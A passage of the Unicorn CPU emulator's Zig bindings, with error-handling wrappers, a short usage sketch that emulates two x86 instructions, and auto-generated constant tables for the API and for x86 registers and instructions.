    try getErrors(c.uc_context_reg_write(ctx, regid, value));
}

pub fn uc_context_reg_read(ctx: ?*c.uc_context, regid: c_int, value: ?*anyopaque) !void {
    try getErrors(c.uc_context_reg_read(ctx, regid, value));
}

pub fn uc_context_reg_write_batch(ctx: ?*c.uc_context, regs: [*c]c_int, vals: [*c]const ?*anyopaque, count: c_int) !void {
    try getErrors(c.uc_context_reg_write_batch(ctx, regs, vals, count));
}

pub fn uc_context_reg_read_batch(ctx: ?*c.uc_context, regs: [*c]c_int, vals: [*c]?*anyopaque, count: c_int) !void {
    try getErrors(c.uc_context_reg_read_batch(ctx, regs, vals, count));
}

pub fn uc_context_restore(uc: ?*c.uc_engine, context: ?*c.uc_context) !void {
    try getErrors(c.uc_context_restore(uc, context));
}

pub fn uc_context_size(uc: ?*c.uc_engine) usize {
    // uc_context_size() reports the required storage size in bytes; it does
    // not return an error code, so there is nothing to convert here.
    return c.uc_context_size(uc);
}

pub fn uc_context_free(context: ?*c.uc_context) !void {
    try getErrors(c.uc_context_free(context));
}

pub const Error = error{
    ucErrNoMemory,
    ucErrArch,
    ucErrHandle,
    ucErrMode,
    ucErrVersion,
    ucErrReadUnmapped,
    ucErrWriteUnmapped,
    ucErrFetchUnmapped,
    ucErrHook,
    ucErrInvalidInstruction,
    ucErrMap,
    ucErrWriteProtected,
    ucErrReadProtected,
    ucErrFetchProtected,
    ucErrInvalidArgument,
    ucErrReadUnaligned,
    ucErrWriteUnaligned,
    ucErrFetchUnaligned,
    ucErrHookAlreadyExists,
    ucErrResource,
    ucErrException,
};

pub fn errorsToZig(err: c.uc_err) Error!c_int {
    return switch (err) {
        // c.UC_ERR_OK is not an error
        c.UC_ERR_NOMEM => error.ucErrNoMemory,
        c.UC_ERR_ARCH => error.ucErrArch,
        c.UC_ERR_HANDLE => error.ucErrHandle,
        c.UC_ERR_MODE => error.ucErrMode,
        c.UC_ERR_VERSION => error.ucErrVersion,
        c.UC_ERR_READ_UNMAPPED => error.ucErrReadUnmapped,
        c.UC_ERR_WRITE_UNMAPPED => error.ucErrWriteUnmapped,
        c.UC_ERR_FETCH_UNMAPPED => error.ucErrFetchUnmapped,
        c.UC_ERR_HOOK => error.ucErrHook,
        c.UC_ERR_INSN_INVALID => error.ucErrInvalidInstruction,
        c.UC_ERR_MAP => error.ucErrMap,
        c.UC_ERR_WRITE_PROT => error.ucErrWriteProtected,
        c.UC_ERR_READ_PROT => error.ucErrReadProtected,
        c.UC_ERR_FETCH_PROT => error.ucErrFetchProtected,
        c.UC_ERR_ARG => error.ucErrInvalidArgument,
        c.UC_ERR_READ_UNALIGNED => error.ucErrReadUnaligned,
        c.UC_ERR_WRITE_UNALIGNED => error.ucErrWriteUnaligned,
        c.UC_ERR_FETCH_UNALIGNED => error.ucErrFetchUnaligned,
        c.UC_ERR_HOOK_EXIST => error.ucErrHookAlreadyExists,
        c.UC_ERR_RESOURCE => error.ucErrResource,
        c.UC_ERR_EXCEPTION => error.ucErrException,
        else => -1,
    };
}

fn getErrors(err: c.uc_err) !void {
    // errorsToZig() returns a Zig error for every failure code and a plain
    // integer otherwise, so success simply falls through.
    _ = try errorsToZig(err);
}

pub const log = @import("std").log.scoped(.unicorn);
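A minimal sketch of driving these wrappers (illustrative only, not part of the bindings): it assumes the file above is importable as a module named "unicorn", which is how build.zig wires it up for the Zig sample, and it uses UC_* constants that come from unicorn.h via the `c` import. The two code bytes are 0x41 (inc ecx) and 0x4a (dec edx) in 32-bit mode.

const unicorn = @import("unicorn");
const c = unicorn.c;

pub fn main() !void {
    var uc: ?*c.uc_engine = null;
    try unicorn.uc_open(c.UC_ARCH_X86, c.UC_MODE_32, &uc);
    defer unicorn.uc_close(uc) catch {};

    const code = [_]u8{ 0x41, 0x4a }; // inc ecx; dec edx
    const base: u64 = 0x1000;

    // Map one page, copy the code in, seed ECX, run, and read ECX back.
    try unicorn.uc_mem_map(uc, base, 0x1000, c.UC_PROT_ALL);
    try unicorn.uc_mem_write(uc, base, &code, code.len);

    var ecx: u64 = 0x1234;
    try unicorn.uc_reg_write(uc, c.UC_X86_REG_ECX, &ecx);
    try unicorn.uc_emu_start(uc, base, base + code.len, 0, 0);
    try unicorn.uc_reg_read(uc, c.UC_X86_REG_ECX, &ecx);

    unicorn.log.info("ECX after emulation: 0x{x}", .{ecx});
}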
unicorn-2.1.1/bindings/zig/unicorn/unicorn_const.zig

// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT
pub const unicornConst = enum(c_int) {
    API_MAJOR = 2, API_MINOR = 1, API_PATCH = 0, API_EXTRA = 255,
    VERSION_MAJOR = 2, VERSION_MINOR = 1, VERSION_PATCH = 0, VERSION_EXTRA = 255,
    SECOND_SCALE = 1000000, MILISECOND_SCALE = 1000,

    ARCH_ARM = 1, ARCH_ARM64 = 2, ARCH_MIPS = 3, ARCH_X86 = 4, ARCH_PPC = 5,
    ARCH_SPARC = 6, ARCH_M68K = 7, ARCH_RISCV = 8, ARCH_S390X = 9, ARCH_TRICORE = 10,
    ARCH_MAX = 11,

    MODE_LITTLE_ENDIAN = 0, MODE_BIG_ENDIAN = 1073741824,
    MODE_ARM = 0, MODE_THUMB = 16, MODE_MCLASS = 32, MODE_V8 = 64, MODE_ARMBE8 = 1024,
    MODE_ARM926 = 128, MODE_ARM946 = 256, MODE_ARM1176 = 512,
    MODE_MICRO = 16, MODE_MIPS3 = 32, MODE_MIPS32R6 = 64, MODE_MIPS32 = 4, MODE_MIPS64 = 8,
    MODE_16 = 2, MODE_32 = 4, MODE_64 = 8,
    MODE_PPC32 = 4, MODE_PPC64 = 8, MODE_QPX = 16,
    MODE_SPARC32 = 4, MODE_SPARC64 = 8, MODE_V9 = 16,
    MODE_RISCV32 = 4, MODE_RISCV64 = 8,

    ERR_OK = 0, ERR_NOMEM = 1, ERR_ARCH = 2, ERR_HANDLE = 3, ERR_MODE = 4, ERR_VERSION = 5,
    ERR_READ_UNMAPPED = 6, ERR_WRITE_UNMAPPED = 7, ERR_FETCH_UNMAPPED = 8, ERR_HOOK = 9,
    ERR_INSN_INVALID = 10, ERR_MAP = 11, ERR_WRITE_PROT = 12, ERR_READ_PROT = 13,
    ERR_FETCH_PROT = 14, ERR_ARG = 15, ERR_READ_UNALIGNED = 16, ERR_WRITE_UNALIGNED = 17,
    ERR_FETCH_UNALIGNED = 18, ERR_HOOK_EXIST = 19, ERR_RESOURCE = 20, ERR_EXCEPTION = 21,
    ERR_OVERFLOW = 22,

    MEM_READ = 16, MEM_WRITE = 17, MEM_FETCH = 18, MEM_READ_UNMAPPED = 19,
    MEM_WRITE_UNMAPPED = 20, MEM_FETCH_UNMAPPED = 21, MEM_WRITE_PROT = 22,
    MEM_READ_PROT = 23, MEM_FETCH_PROT = 24, MEM_READ_AFTER = 25,

    TCG_OP_SUB = 0, TCG_OP_FLAG_CMP = 1, TCG_OP_FLAG_DIRECT = 2,

    HOOK_INTR = 1, HOOK_INSN = 2, HOOK_CODE = 4, HOOK_BLOCK = 8,
    HOOK_MEM_READ_UNMAPPED = 16, HOOK_MEM_WRITE_UNMAPPED = 32, HOOK_MEM_FETCH_UNMAPPED = 64,
    HOOK_MEM_READ_PROT = 128, HOOK_MEM_WRITE_PROT = 256, HOOK_MEM_FETCH_PROT = 512,
    HOOK_MEM_READ = 1024, HOOK_MEM_WRITE = 2048, HOOK_MEM_FETCH = 4096, HOOK_MEM_READ_AFTER = 8192,
    HOOK_INSN_INVALID = 16384, HOOK_EDGE_GENERATED = 32768, HOOK_TCG_OPCODE = 65536, HOOK_TLB_FILL = 131072,
    HOOK_MEM_UNMAPPED = 112, HOOK_MEM_PROT = 896, HOOK_MEM_READ_INVALID = 144,
    HOOK_MEM_WRITE_INVALID = 288, HOOK_MEM_FETCH_INVALID = 576, HOOK_MEM_INVALID = 1008,
    HOOK_MEM_VALID = 7168,

    QUERY_MODE = 1, QUERY_PAGE_SIZE = 2, QUERY_ARCH = 3, QUERY_TIMEOUT = 4,

    CTL_IO_NONE = 0, CTL_IO_WRITE = 1, CTL_IO_READ = 2, CTL_IO_READ_WRITE = 3,

    TLB_CPU = 0, TLB_VIRTUAL = 1,

    CTL_UC_MODE = 0, CTL_UC_PAGE_SIZE = 1, CTL_UC_ARCH = 2, CTL_UC_TIMEOUT = 3,
    CTL_UC_USE_EXITS = 4, CTL_UC_EXITS_CNT = 5, CTL_UC_EXITS = 6, CTL_CPU_MODEL = 7,
    CTL_TB_REQUEST_CACHE = 8, CTL_TB_REMOVE_CACHE = 9, CTL_TB_FLUSH = 10, CTL_TLB_FLUSH = 11,
    CTL_TLB_TYPE = 12, CTL_TCG_BUFFER_SIZE = 13, CTL_CONTEXT_MODE = 14,

    PROT_NONE = 0, PROT_READ = 1, PROT_WRITE = 2, PROT_EXEC = 4, PROT_ALL = 7,

    CTL_CONTEXT_CPU = 1, CTL_CONTEXT_MEMORY = 2,
};
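The aggregate HOOK_MEM_* masks near the end of the table are bitwise ORs of the individual hook flags. A small illustrative comptime check (values transcribed from the table above; not part of the generated file):

const std = @import("std");

comptime {
    // Each aggregate mask is the union of its member flags.
    std.debug.assert((16 | 32 | 64) == 112); // HOOK_MEM_UNMAPPED
    std.debug.assert((128 | 256 | 512) == 896); // HOOK_MEM_PROT
    std.debug.assert((1024 | 2048 | 4096) == 7168); // HOOK_MEM_VALID
    std.debug.assert((112 | 896) == 1008); // HOOK_MEM_INVALID
}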
unicorn-2.1.1/bindings/zig/unicorn/x86_const.zig

// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT
pub const x86Const = enum(c_int) {
    // X86 CPU
    CPU_X86_QEMU64 = 0, CPU_X86_PHENOM = 1, CPU_X86_CORE2DUO = 2, CPU_X86_KVM64 = 3,
    CPU_X86_QEMU32 = 4, CPU_X86_KVM32 = 5, CPU_X86_COREDUO = 6, CPU_X86_486 = 7,
    CPU_X86_PENTIUM = 8, CPU_X86_PENTIUM2 = 9, CPU_X86_PENTIUM3 = 10, CPU_X86_ATHLON = 11,
    CPU_X86_N270 = 12, CPU_X86_CONROE = 13, CPU_X86_PENRYN = 14, CPU_X86_NEHALEM = 15,
    CPU_X86_WESTMERE = 16, CPU_X86_SANDYBRIDGE = 17, CPU_X86_IVYBRIDGE = 18, CPU_X86_HASWELL = 19,
    CPU_X86_BROADWELL = 20, CPU_X86_SKYLAKE_CLIENT = 21, CPU_X86_SKYLAKE_SERVER = 22,
    CPU_X86_CASCADELAKE_SERVER = 23, CPU_X86_COOPERLAKE = 24, CPU_X86_ICELAKE_CLIENT = 25,
    CPU_X86_ICELAKE_SERVER = 26, CPU_X86_DENVERTON = 27, CPU_X86_SNOWRIDGE = 28,
    CPU_X86_KNIGHTSMILL = 29, CPU_X86_OPTERON_G1 = 30, CPU_X86_OPTERON_G2 = 31, CPU_X86_OPTERON_G3 = 32,
    CPU_X86_OPTERON_G4 = 33, CPU_X86_OPTERON_G5 = 34, CPU_X86_EPYC = 35, CPU_X86_DHYANA = 36,
    CPU_X86_EPYC_ROME = 37, CPU_X86_ENDING = 38,

    // X86 registers
    X86_REG_INVALID = 0, X86_REG_AH = 1, X86_REG_AL = 2, X86_REG_AX = 3, X86_REG_BH = 4,
    X86_REG_BL = 5, X86_REG_BP = 6, X86_REG_BPL = 7, X86_REG_BX = 8, X86_REG_CH = 9,
    X86_REG_CL = 10, X86_REG_CS = 11, X86_REG_CX = 12, X86_REG_DH = 13, X86_REG_DI = 14,
    X86_REG_DIL = 15, X86_REG_DL = 16, X86_REG_DS = 17, X86_REG_DX = 18, X86_REG_EAX = 19,
    X86_REG_EBP = 20, X86_REG_EBX = 21, X86_REG_ECX = 22, X86_REG_EDI = 23, X86_REG_EDX = 24,
    X86_REG_EFLAGS = 25, X86_REG_EIP = 26, X86_REG_ES = 28, X86_REG_ESI = 29, X86_REG_ESP = 30,
    X86_REG_FPSW = 31, X86_REG_FS = 32, X86_REG_GS = 33, X86_REG_IP = 34, X86_REG_RAX = 35,
    X86_REG_RBP = 36, X86_REG_RBX = 37, X86_REG_RCX = 38, X86_REG_RDI = 39, X86_REG_RDX = 40,
    X86_REG_RIP = 41, X86_REG_RSI = 43, X86_REG_RSP = 44, X86_REG_SI = 45, X86_REG_SIL = 46,
    X86_REG_SP = 47, X86_REG_SPL = 48, X86_REG_SS = 49,
    X86_REG_CR0 = 50, X86_REG_CR1 = 51, X86_REG_CR2 = 52, X86_REG_CR3 = 53, X86_REG_CR4 = 54,
    X86_REG_CR8 = 58,
    X86_REG_DR0 = 66, X86_REG_DR1 = 67, X86_REG_DR2 = 68, X86_REG_DR3 = 69, X86_REG_DR4 = 70,
    X86_REG_DR5 = 71, X86_REG_DR6 = 72, X86_REG_DR7 = 73,
    X86_REG_FP0 = 82, X86_REG_FP1 = 83, X86_REG_FP2 = 84, X86_REG_FP3 = 85, X86_REG_FP4 = 86,
    X86_REG_FP5 = 87, X86_REG_FP6 = 88, X86_REG_FP7 = 89,
    X86_REG_K0 = 90, X86_REG_K1 = 91, X86_REG_K2 = 92, X86_REG_K3 = 93, X86_REG_K4 = 94,
    X86_REG_K5 = 95, X86_REG_K6 = 96, X86_REG_K7 = 97,
    X86_REG_MM0 = 98, X86_REG_MM1 = 99, X86_REG_MM2 = 100, X86_REG_MM3 = 101, X86_REG_MM4 = 102,
    X86_REG_MM5 = 103, X86_REG_MM6 = 104, X86_REG_MM7 = 105,
    X86_REG_R8 = 106, X86_REG_R9 = 107, X86_REG_R10 = 108, X86_REG_R11 = 109, X86_REG_R12 = 110,
    X86_REG_R13 = 111, X86_REG_R14 = 112, X86_REG_R15 = 113,
    X86_REG_ST0 = 114, X86_REG_ST1 = 115, X86_REG_ST2 = 116, X86_REG_ST3 = 117, X86_REG_ST4 = 118,
    X86_REG_ST5 = 119, X86_REG_ST6 = 120, X86_REG_ST7 = 121,
    X86_REG_XMM0 = 122, X86_REG_XMM1 = 123, X86_REG_XMM2 = 124, X86_REG_XMM3 = 125, X86_REG_XMM4 = 126,
    X86_REG_XMM5 = 127, X86_REG_XMM6 = 128, X86_REG_XMM7 = 129, X86_REG_XMM8 = 130, X86_REG_XMM9 = 131,
    X86_REG_XMM10 = 132, X86_REG_XMM11 = 133, X86_REG_XMM12 = 134, X86_REG_XMM13 = 135, X86_REG_XMM14 = 136,
    X86_REG_XMM15 = 137, X86_REG_XMM16 = 138, X86_REG_XMM17 = 139, X86_REG_XMM18 = 140, X86_REG_XMM19 = 141,
    X86_REG_XMM20 = 142, X86_REG_XMM21 = 143, X86_REG_XMM22 = 144, X86_REG_XMM23 = 145, X86_REG_XMM24 = 146,
    X86_REG_XMM25 = 147, X86_REG_XMM26 = 148, X86_REG_XMM27 = 149, X86_REG_XMM28 = 150, X86_REG_XMM29 = 151,
    X86_REG_XMM30 = 152, X86_REG_XMM31 = 153, X86_REG_YMM0 = 154, X86_REG_YMM1 = 155, X86_REG_YMM2 = 156,
X86_REG_YMM3 = 157, X86_REG_YMM4 = 158, X86_REG_YMM5 = 159, X86_REG_YMM6 = 160, X86_REG_YMM7 = 161, X86_REG_YMM8 = 162, X86_REG_YMM9 = 163, X86_REG_YMM10 = 164, X86_REG_YMM11 = 165, X86_REG_YMM12 = 166, X86_REG_YMM13 = 167, X86_REG_YMM14 = 168, X86_REG_YMM15 = 169, X86_REG_YMM16 = 170, X86_REG_YMM17 = 171, X86_REG_YMM18 = 172, X86_REG_YMM19 = 173, X86_REG_YMM20 = 174, X86_REG_YMM21 = 175, X86_REG_YMM22 = 176, X86_REG_YMM23 = 177, X86_REG_YMM24 = 178, X86_REG_YMM25 = 179, X86_REG_YMM26 = 180, X86_REG_YMM27 = 181, X86_REG_YMM28 = 182, X86_REG_YMM29 = 183, X86_REG_YMM30 = 184, X86_REG_YMM31 = 185, X86_REG_ZMM0 = 186, X86_REG_ZMM1 = 187, X86_REG_ZMM2 = 188, X86_REG_ZMM3 = 189, X86_REG_ZMM4 = 190, X86_REG_ZMM5 = 191, X86_REG_ZMM6 = 192, X86_REG_ZMM7 = 193, X86_REG_ZMM8 = 194, X86_REG_ZMM9 = 195, X86_REG_ZMM10 = 196, X86_REG_ZMM11 = 197, X86_REG_ZMM12 = 198, X86_REG_ZMM13 = 199, X86_REG_ZMM14 = 200, X86_REG_ZMM15 = 201, X86_REG_ZMM16 = 202, X86_REG_ZMM17 = 203, X86_REG_ZMM18 = 204, X86_REG_ZMM19 = 205, X86_REG_ZMM20 = 206, X86_REG_ZMM21 = 207, X86_REG_ZMM22 = 208, X86_REG_ZMM23 = 209, X86_REG_ZMM24 = 210, X86_REG_ZMM25 = 211, X86_REG_ZMM26 = 212, X86_REG_ZMM27 = 213, X86_REG_ZMM28 = 214, X86_REG_ZMM29 = 215, X86_REG_ZMM30 = 216, X86_REG_ZMM31 = 217, X86_REG_R8B = 218, X86_REG_R9B = 219, X86_REG_R10B = 220, X86_REG_R11B = 221, X86_REG_R12B = 222, X86_REG_R13B = 223, X86_REG_R14B = 224, X86_REG_R15B = 225, X86_REG_R8D = 226, X86_REG_R9D = 227, X86_REG_R10D = 228, X86_REG_R11D = 229, X86_REG_R12D = 230, X86_REG_R13D = 231, X86_REG_R14D = 232, X86_REG_R15D = 233, X86_REG_R8W = 234, X86_REG_R9W = 235, X86_REG_R10W = 236, X86_REG_R11W = 237, X86_REG_R12W = 238, X86_REG_R13W = 239, X86_REG_R14W = 240, X86_REG_R15W = 241, X86_REG_IDTR = 242, X86_REG_GDTR = 243, X86_REG_LDTR = 244, X86_REG_TR = 245, X86_REG_FPCW = 246, X86_REG_FPTAG = 247, X86_REG_MSR = 248, X86_REG_MXCSR = 249, X86_REG_FS_BASE = 250, X86_REG_GS_BASE = 251, X86_REG_FLAGS = 252, X86_REG_RFLAGS = 253, X86_REG_FIP = 254, X86_REG_FCS = 255, X86_REG_FDP = 256, X86_REG_FDS = 257, X86_REG_FOP = 258, X86_REG_ENDING = 259, // X86 instructions X86_INS_INVALID = 0, X86_INS_AAA = 1, X86_INS_AAD = 2, X86_INS_AAM = 3, X86_INS_AAS = 4, X86_INS_FABS = 5, X86_INS_ADC = 6, X86_INS_ADCX = 7, X86_INS_ADD = 8, X86_INS_ADDPD = 9, X86_INS_ADDPS = 10, X86_INS_ADDSD = 11, X86_INS_ADDSS = 12, X86_INS_ADDSUBPD = 13, X86_INS_ADDSUBPS = 14, X86_INS_FADD = 15, X86_INS_FIADD = 16, X86_INS_FADDP = 17, X86_INS_ADOX = 18, X86_INS_AESDECLAST = 19, X86_INS_AESDEC = 20, X86_INS_AESENCLAST = 21, X86_INS_AESENC = 22, X86_INS_AESIMC = 23, X86_INS_AESKEYGENASSIST = 24, X86_INS_AND = 25, X86_INS_ANDN = 26, X86_INS_ANDNPD = 27, X86_INS_ANDNPS = 28, X86_INS_ANDPD = 29, X86_INS_ANDPS = 30, X86_INS_ARPL = 31, X86_INS_BEXTR = 32, X86_INS_BLCFILL = 33, X86_INS_BLCI = 34, X86_INS_BLCIC = 35, X86_INS_BLCMSK = 36, X86_INS_BLCS = 37, X86_INS_BLENDPD = 38, X86_INS_BLENDPS = 39, X86_INS_BLENDVPD = 40, X86_INS_BLENDVPS = 41, X86_INS_BLSFILL = 42, X86_INS_BLSI = 43, X86_INS_BLSIC = 44, X86_INS_BLSMSK = 45, X86_INS_BLSR = 46, X86_INS_BOUND = 47, X86_INS_BSF = 48, X86_INS_BSR = 49, X86_INS_BSWAP = 50, X86_INS_BT = 51, X86_INS_BTC = 52, X86_INS_BTR = 53, X86_INS_BTS = 54, X86_INS_BZHI = 55, X86_INS_CALL = 56, X86_INS_CBW = 57, X86_INS_CDQ = 58, X86_INS_CDQE = 59, X86_INS_FCHS = 60, X86_INS_CLAC = 61, X86_INS_CLC = 62, X86_INS_CLD = 63, X86_INS_CLFLUSH = 64, X86_INS_CLFLUSHOPT = 65, X86_INS_CLGI = 66, X86_INS_CLI = 67, X86_INS_CLTS = 68, X86_INS_CLWB = 69, X86_INS_CMC = 70, X86_INS_CMOVA = 71, 
X86_INS_CMOVAE = 72, X86_INS_CMOVB = 73, X86_INS_CMOVBE = 74, X86_INS_FCMOVBE = 75, X86_INS_FCMOVB = 76, X86_INS_CMOVE = 77, X86_INS_FCMOVE = 78, X86_INS_CMOVG = 79, X86_INS_CMOVGE = 80, X86_INS_CMOVL = 81, X86_INS_CMOVLE = 82, X86_INS_FCMOVNBE = 83, X86_INS_FCMOVNB = 84, X86_INS_CMOVNE = 85, X86_INS_FCMOVNE = 86, X86_INS_CMOVNO = 87, X86_INS_CMOVNP = 88, X86_INS_FCMOVNU = 89, X86_INS_CMOVNS = 90, X86_INS_CMOVO = 91, X86_INS_CMOVP = 92, X86_INS_FCMOVU = 93, X86_INS_CMOVS = 94, X86_INS_CMP = 95, X86_INS_CMPPD = 96, X86_INS_CMPPS = 97, X86_INS_CMPSB = 98, X86_INS_CMPSD = 99, X86_INS_CMPSQ = 100, X86_INS_CMPSS = 101, X86_INS_CMPSW = 102, X86_INS_CMPXCHG16B = 103, X86_INS_CMPXCHG = 104, X86_INS_CMPXCHG8B = 105, X86_INS_COMISD = 106, X86_INS_COMISS = 107, X86_INS_FCOMP = 108, X86_INS_FCOMPI = 109, X86_INS_FCOMI = 110, X86_INS_FCOM = 111, X86_INS_FCOS = 112, X86_INS_CPUID = 113, X86_INS_CQO = 114, X86_INS_CRC32 = 115, X86_INS_CVTDQ2PD = 116, X86_INS_CVTDQ2PS = 117, X86_INS_CVTPD2DQ = 118, X86_INS_CVTPD2PS = 119, X86_INS_CVTPS2DQ = 120, X86_INS_CVTPS2PD = 121, X86_INS_CVTSD2SI = 122, X86_INS_CVTSD2SS = 123, X86_INS_CVTSI2SD = 124, X86_INS_CVTSI2SS = 125, X86_INS_CVTSS2SD = 126, X86_INS_CVTSS2SI = 127, X86_INS_CVTTPD2DQ = 128, X86_INS_CVTTPS2DQ = 129, X86_INS_CVTTSD2SI = 130, X86_INS_CVTTSS2SI = 131, X86_INS_CWD = 132, X86_INS_CWDE = 133, X86_INS_DAA = 134, X86_INS_DAS = 135, X86_INS_DATA16 = 136, X86_INS_DEC = 137, X86_INS_DIV = 138, X86_INS_DIVPD = 139, X86_INS_DIVPS = 140, X86_INS_FDIVR = 141, X86_INS_FIDIVR = 142, X86_INS_FDIVRP = 143, X86_INS_DIVSD = 144, X86_INS_DIVSS = 145, X86_INS_FDIV = 146, X86_INS_FIDIV = 147, X86_INS_FDIVP = 148, X86_INS_DPPD = 149, X86_INS_DPPS = 150, X86_INS_RET = 151, X86_INS_ENCLS = 152, X86_INS_ENCLU = 153, X86_INS_ENTER = 154, X86_INS_EXTRACTPS = 155, X86_INS_EXTRQ = 156, X86_INS_F2XM1 = 157, X86_INS_LCALL = 158, X86_INS_LJMP = 159, X86_INS_FBLD = 160, X86_INS_FBSTP = 161, X86_INS_FCOMPP = 162, X86_INS_FDECSTP = 163, X86_INS_FEMMS = 164, X86_INS_FFREE = 165, X86_INS_FICOM = 166, X86_INS_FICOMP = 167, X86_INS_FINCSTP = 168, X86_INS_FLDCW = 169, X86_INS_FLDENV = 170, X86_INS_FLDL2E = 171, X86_INS_FLDL2T = 172, X86_INS_FLDLG2 = 173, X86_INS_FLDLN2 = 174, X86_INS_FLDPI = 175, X86_INS_FNCLEX = 176, X86_INS_FNINIT = 177, X86_INS_FNOP = 178, X86_INS_FNSTCW = 179, X86_INS_FNSTSW = 180, X86_INS_FPATAN = 181, X86_INS_FPREM = 182, X86_INS_FPREM1 = 183, X86_INS_FPTAN = 184, X86_INS_FFREEP = 185, X86_INS_FRNDINT = 186, X86_INS_FRSTOR = 187, X86_INS_FNSAVE = 188, X86_INS_FSCALE = 189, X86_INS_FSETPM = 190, X86_INS_FSINCOS = 191, X86_INS_FNSTENV = 192, X86_INS_FXAM = 193, X86_INS_FXRSTOR = 194, X86_INS_FXRSTOR64 = 195, X86_INS_FXSAVE = 196, X86_INS_FXSAVE64 = 197, X86_INS_FXTRACT = 198, X86_INS_FYL2X = 199, X86_INS_FYL2XP1 = 200, X86_INS_MOVAPD = 201, X86_INS_MOVAPS = 202, X86_INS_ORPD = 203, X86_INS_ORPS = 204, X86_INS_VMOVAPD = 205, X86_INS_VMOVAPS = 206, X86_INS_XORPD = 207, X86_INS_XORPS = 208, X86_INS_GETSEC = 209, X86_INS_HADDPD = 210, X86_INS_HADDPS = 211, X86_INS_HLT = 212, X86_INS_HSUBPD = 213, X86_INS_HSUBPS = 214, X86_INS_IDIV = 215, X86_INS_FILD = 216, X86_INS_IMUL = 217, X86_INS_IN = 218, X86_INS_INC = 219, X86_INS_INSB = 220, X86_INS_INSERTPS = 221, X86_INS_INSERTQ = 222, X86_INS_INSD = 223, X86_INS_INSW = 224, X86_INS_INT = 225, X86_INS_INT1 = 226, X86_INS_INT3 = 227, X86_INS_INTO = 228, X86_INS_INVD = 229, X86_INS_INVEPT = 230, X86_INS_INVLPG = 231, X86_INS_INVLPGA = 232, X86_INS_INVPCID = 233, X86_INS_INVVPID = 234, X86_INS_IRET = 235, X86_INS_IRETD = 236, 
X86_INS_IRETQ = 237, X86_INS_FISTTP = 238, X86_INS_FIST = 239, X86_INS_FISTP = 240, X86_INS_UCOMISD = 241, X86_INS_UCOMISS = 242, X86_INS_VCOMISD = 243, X86_INS_VCOMISS = 244, X86_INS_VCVTSD2SS = 245, X86_INS_VCVTSI2SD = 246, X86_INS_VCVTSI2SS = 247, X86_INS_VCVTSS2SD = 248, X86_INS_VCVTTSD2SI = 249, X86_INS_VCVTTSD2USI = 250, X86_INS_VCVTTSS2SI = 251, X86_INS_VCVTTSS2USI = 252, X86_INS_VCVTUSI2SD = 253, X86_INS_VCVTUSI2SS = 254, X86_INS_VUCOMISD = 255, X86_INS_VUCOMISS = 256, X86_INS_JAE = 257, X86_INS_JA = 258, X86_INS_JBE = 259, X86_INS_JB = 260, X86_INS_JCXZ = 261, X86_INS_JECXZ = 262, X86_INS_JE = 263, X86_INS_JGE = 264, X86_INS_JG = 265, X86_INS_JLE = 266, X86_INS_JL = 267, X86_INS_JMP = 268, X86_INS_JNE = 269, X86_INS_JNO = 270, X86_INS_JNP = 271, X86_INS_JNS = 272, X86_INS_JO = 273, X86_INS_JP = 274, X86_INS_JRCXZ = 275, X86_INS_JS = 276, X86_INS_KANDB = 277, X86_INS_KANDD = 278, X86_INS_KANDNB = 279, X86_INS_KANDND = 280, X86_INS_KANDNQ = 281, X86_INS_KANDNW = 282, X86_INS_KANDQ = 283, X86_INS_KANDW = 284, X86_INS_KMOVB = 285, X86_INS_KMOVD = 286, X86_INS_KMOVQ = 287, X86_INS_KMOVW = 288, X86_INS_KNOTB = 289, X86_INS_KNOTD = 290, X86_INS_KNOTQ = 291, X86_INS_KNOTW = 292, X86_INS_KORB = 293, X86_INS_KORD = 294, X86_INS_KORQ = 295, X86_INS_KORTESTB = 296, X86_INS_KORTESTD = 297, X86_INS_KORTESTQ = 298, X86_INS_KORTESTW = 299, X86_INS_KORW = 300, X86_INS_KSHIFTLB = 301, X86_INS_KSHIFTLD = 302, X86_INS_KSHIFTLQ = 303, X86_INS_KSHIFTLW = 304, X86_INS_KSHIFTRB = 305, X86_INS_KSHIFTRD = 306, X86_INS_KSHIFTRQ = 307, X86_INS_KSHIFTRW = 308, X86_INS_KUNPCKBW = 309, X86_INS_KXNORB = 310, X86_INS_KXNORD = 311, X86_INS_KXNORQ = 312, X86_INS_KXNORW = 313, X86_INS_KXORB = 314, X86_INS_KXORD = 315, X86_INS_KXORQ = 316, X86_INS_KXORW = 317, X86_INS_LAHF = 318, X86_INS_LAR = 319, X86_INS_LDDQU = 320, X86_INS_LDMXCSR = 321, X86_INS_LDS = 322, X86_INS_FLDZ = 323, X86_INS_FLD1 = 324, X86_INS_FLD = 325, X86_INS_LEA = 326, X86_INS_LEAVE = 327, X86_INS_LES = 328, X86_INS_LFENCE = 329, X86_INS_LFS = 330, X86_INS_LGDT = 331, X86_INS_LGS = 332, X86_INS_LIDT = 333, X86_INS_LLDT = 334, X86_INS_LMSW = 335, X86_INS_OR = 336, X86_INS_SUB = 337, X86_INS_XOR = 338, X86_INS_LODSB = 339, X86_INS_LODSD = 340, X86_INS_LODSQ = 341, X86_INS_LODSW = 342, X86_INS_LOOP = 343, X86_INS_LOOPE = 344, X86_INS_LOOPNE = 345, X86_INS_RETF = 346, X86_INS_RETFQ = 347, X86_INS_LSL = 348, X86_INS_LSS = 349, X86_INS_LTR = 350, X86_INS_XADD = 351, X86_INS_LZCNT = 352, X86_INS_MASKMOVDQU = 353, X86_INS_MAXPD = 354, X86_INS_MAXPS = 355, X86_INS_MAXSD = 356, X86_INS_MAXSS = 357, X86_INS_MFENCE = 358, X86_INS_MINPD = 359, X86_INS_MINPS = 360, X86_INS_MINSD = 361, X86_INS_MINSS = 362, X86_INS_CVTPD2PI = 363, X86_INS_CVTPI2PD = 364, X86_INS_CVTPI2PS = 365, X86_INS_CVTPS2PI = 366, X86_INS_CVTTPD2PI = 367, X86_INS_CVTTPS2PI = 368, X86_INS_EMMS = 369, X86_INS_MASKMOVQ = 370, X86_INS_MOVD = 371, X86_INS_MOVDQ2Q = 372, X86_INS_MOVNTQ = 373, X86_INS_MOVQ2DQ = 374, X86_INS_MOVQ = 375, X86_INS_PABSB = 376, X86_INS_PABSD = 377, X86_INS_PABSW = 378, X86_INS_PACKSSDW = 379, X86_INS_PACKSSWB = 380, X86_INS_PACKUSWB = 381, X86_INS_PADDB = 382, X86_INS_PADDD = 383, X86_INS_PADDQ = 384, X86_INS_PADDSB = 385, X86_INS_PADDSW = 386, X86_INS_PADDUSB = 387, X86_INS_PADDUSW = 388, X86_INS_PADDW = 389, X86_INS_PALIGNR = 390, X86_INS_PANDN = 391, 